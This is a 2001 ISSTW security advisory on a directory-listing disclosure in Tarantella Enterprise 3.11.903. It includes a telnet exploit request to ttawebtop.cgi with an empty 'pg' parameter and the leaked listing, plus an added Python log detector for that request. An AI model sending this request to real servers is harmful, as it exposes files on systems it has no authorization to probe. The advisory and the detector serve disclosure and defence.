ISSTW Security Advisory (ISSTW200201)

Tarantella Enterprise 3.11.903 Directory Index Disclosure Vulnerability

Discovery Date: Fri, 21 Dec 2001
----------------------------------------------------------------------

Overview:
---------
ISSTW Tiger-Force discovered a vulnerability in Tarantella Enterprise 3
that reveals directory content when a blank parameter is used.

Problem Description:
--------------------
Tarantella Enterprise 3 is a non-intrusive application/data
centralization solution. End users can access enterprise resources via
the web interface. The vulnerability allows a malicious user to view
the directory content.

Exploit:
--------
shell$ telnet tarantella.somewhere.com 80
Trying 12.34.56.78...
Connected to 12.34.56.78.
Escape character is '^]'.
GET /cgi-bin/ttawebtop.cgi/?action=start&pg= HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 21 Dec 2001 11:34:39 GMT
Server: Apache/1.3.4 (Unix)
Content-length: 512
Connection: close
Content-Type: text/html

?C . ¨º .. 4 cgi-bin ?E direct.html on examples ? help ?Y index.html ?Z index2.html ?[ kiosk.html ?\ kiosk2.html ?] loader.html % mac -v resources native 5 java ?w index2.html.orig ›o modules Îb tsp les x resources.3_11.tar ,w resources.old

Tested Platform:
---------------
Tarantella Enterprise 3.11.903

Tested OS:
----------
Solaris 7 (Sparc)

Patch Information:
------------------
http://www.tarantella.com/security/bulletin-03.html

Credit:
-------
This vulnerability was discovered and researched by Chieh-Chun Lin
(cclin@iss.com.tw)

Disclaimer:
All information in these advisories is subject to change without
advance notice or mutual consensus, and each advisory is released as
is. ISSTW is not responsible for any risks of occurrences caused by
applying this information.
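
Added example (not part of the ISSTW advisory): a log check for the request shown in the Exploit section, which finds requests to ttawebtop.cgi that carry an empty pg parameter. It assumes the web server writes Apache Common Log Format; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
CGI_PATH = "/cgi-bin/ttawebtop.cgi"  # path taken from the advisory's request


def find_blank_pg_requests(lines):
    """Return (host, time, target, status) for requests to ttawebtop.cgi
    that carry a 'pg' parameter with an empty value."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        url = urlsplit(m["target"])
        if not url.path.startswith(CGI_PATH):
            continue
        # keep_blank_values=True is essential: by default parse_qsl drops "pg="
        params = parse_qsl(url.query, keep_blank_values=True)
        if any(k == "pg" and v == "" for k, v in params):
            hits.append((m["host"], m["time"], m["target"], int(m["status"])))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Dec/2001:11:34:39 +0000] "GET /cgi-bin/ttawebtop.cgi/?action=start&pg= HTTP/1.0" 200 512',
    '192.0.2.11 - - [21/Dec/2001:11:35:02 +0000] "GET /cgi-bin/ttawebtop.cgi/?action=start&pg=index.html HTTP/1.0" 200 2048',
    '192.0.2.12 - - [21/Dec/2001:11:36:17 +0000] "GET /index.html HTTP/1.0" 200 1024',
    '192.0.2.13 - - [21/Dec/2001:11:37:40 +0000] "GET /cgi-bin/ttawebtop.cgi/?pg=&action=start HTTP/1.0" 404 210',
]

if __name__ == "__main__":
    for host, when, target, status in find_blank_pg_requests(SAMPLE_LOG):
        note = "served (check response body)" if status == 200 else "not served"
        print(f"{when} {host} {target} -> {status} {note}")
```

A 200 status on a matching line means the server answered the blank-parameter request, so that host should be checked against the vendor bulletin listed under Patch Information.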